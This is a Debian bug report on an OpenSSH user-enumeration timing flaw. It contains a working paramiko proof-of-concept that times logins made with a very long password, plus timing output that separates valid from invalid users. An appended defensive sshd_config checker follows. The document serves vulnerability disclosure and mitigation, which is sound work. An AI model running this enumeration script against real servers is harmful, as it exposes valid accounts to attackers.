Bug#831902: SSH User Enumeration issue still present
I have installed this patch on a few servers; however, the timing issue still
seems to be present.
I tried setting up a fresh server using the netinst .iso file and I only
installed the "SSH server" package in the Software selection stage (no other
packages were installed and no configuration changes were made). I ensured that
all the packages were up to date.
michael@ssh-test-box:~$ sudo sshd -v
[sudo] password for michael:
unknown option -- v
OpenSSH_6.7p1 Debian-5+deb8u3, OpenSSL 1.0.1t 3 May 2016
usage: sshd [-46DdeiqTt] [-b bits] [-C connection_spec] [-c host_cert_file]
[-E log_file] [-f config_file] [-g login_grace_time]
[-h host_key_file] [-k key_gen_time] [-o option] [-p port]
[-u len]
Then I ran the POC code (below): valid users took 22 seconds to fail, while
invalid users took around 3 seconds.
Setting PasswordAuthentication no in /etc/ssh/sshd_config mitigates this issue.
[michael@ezreal ~]$ python ssh_test.py
user: alice
0:00:02.039722
[michael@ezreal ~]$ python ssh_test.py
user: bob
0:00:02.613451
[michael@ezreal ~]$ python ssh_test.py
user: michael
0:00:22.195203
[michael@ezreal ~]$ python ssh_test.py
user: eve
0:00:03.564072
# ssh_test.py
import paramiko
from datetime import datetime

user = input("user: ")
p = 'A' * 25000  # deliberately long password, as in the report

ssh = paramiko.SSHClient()
starttime = datetime.now()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect('ssh-test-box.internal', username=user, password=p)
except Exception:
    # authentication failure is the expected outcome; time it either way
    pass
finally:
    ssh.close()
endtime = datetime.now()
total = endtime - starttime
print(total)
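The report names "PasswordAuthentication no" as the mitigation. As an added example (not part of the bug report or of the Debian package), here is a small Python checker that parses an sshd_config the way sshd does and reports whether password authentication is effectively disabled, including the case where a Match block quietly turns it back on. The config text inside is constructed for illustration; the function and variable names are the example's own.

```python
# Added example (not from the bug report): parse an sshd_config and report
# whether PasswordAuthentication is effectively off, which is the mitigation
# the report names. The config text below is constructed for illustration.
import re

# sshd's built-in default when the keyword is absent from the file.
DEFAULT_PASSWORD_AUTH = "yes"

# 'Keyword value' or 'Keyword=value'; keywords are letters only.
_LINE = re.compile(r"^([A-Za-z]+)\s*(?:=|\s)\s*(.*?)\s*$")


def parse_sshd_config(text):
    """Split sshd_config text into (global_opts, match_blocks).

    Mirrors sshd's parsing rules: keywords are case-insensitive, either
    'Key value' or 'Key=value' is accepted, comment and blank lines are
    skipped, and the FIRST occurrence of a keyword wins. Everything after a
    'Match' line applies only when its criteria match, so those settings
    are kept per block instead of being merged into the global section.
    """
    global_opts = {}
    match_blocks = []  # [(criteria, {keyword: value}), ...]
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            current = (value, {})
            match_blocks.append(current)
            continue
        target = global_opts if current is None else current[1]
        target.setdefault(key, value)  # first occurrence wins
    return global_opts, match_blocks


def password_auth_status(text):
    """Summarise whether password authentication is disabled.

    'mitigated' is True only when the global value is 'no' AND no Match
    block re-enables it for some users or hosts.
    """
    global_opts, match_blocks = parse_sshd_config(text)
    global_value = global_opts.get("passwordauthentication",
                                   DEFAULT_PASSWORD_AUTH).lower()
    reenabled = [criteria for criteria, opts in match_blocks
                 if opts.get("passwordauthentication", "").lower() == "yes"]
    # keyboard-interactive (PAM) can still prompt for a password, so report
    # ChallengeResponseAuthentication as well (sshd default: yes).
    challenge = global_opts.get("challengeresponseauthentication", "yes").lower()
    return {
        "global": global_value,
        "match_reenabled": reenabled,
        "challenge_response": challenge,
        "mitigated": global_value == "no" and not reenabled,
    }


# Constructed sample: the mitigation is applied globally, but a Match block
# re-enables passwords for one account, so the check must flag it.
SAMPLE_CONFIG = """\
# constructed sample sshd_config
Port 22
PasswordAuthentication no
# second occurrence is ignored by sshd (first wins)
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes

Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    status = password_auth_status(SAMPLE_CONFIG)
    print(status)
    if not status["mitigated"]:
        print("password authentication still reachable via:",
              status["match_reenabled"] or "global setting")
```

Run it against the real file with `password_auth_status(open("/etc/ssh/sshd_config").read())`; a result of `mitigated: True` means the keyword is set to `no` at global scope and no Match block undoes it. The checker intentionally also surfaces ChallengeResponseAuthentication, since with UsePAM a keyboard-interactive prompt can still accept a password even when PasswordAuthentication is off.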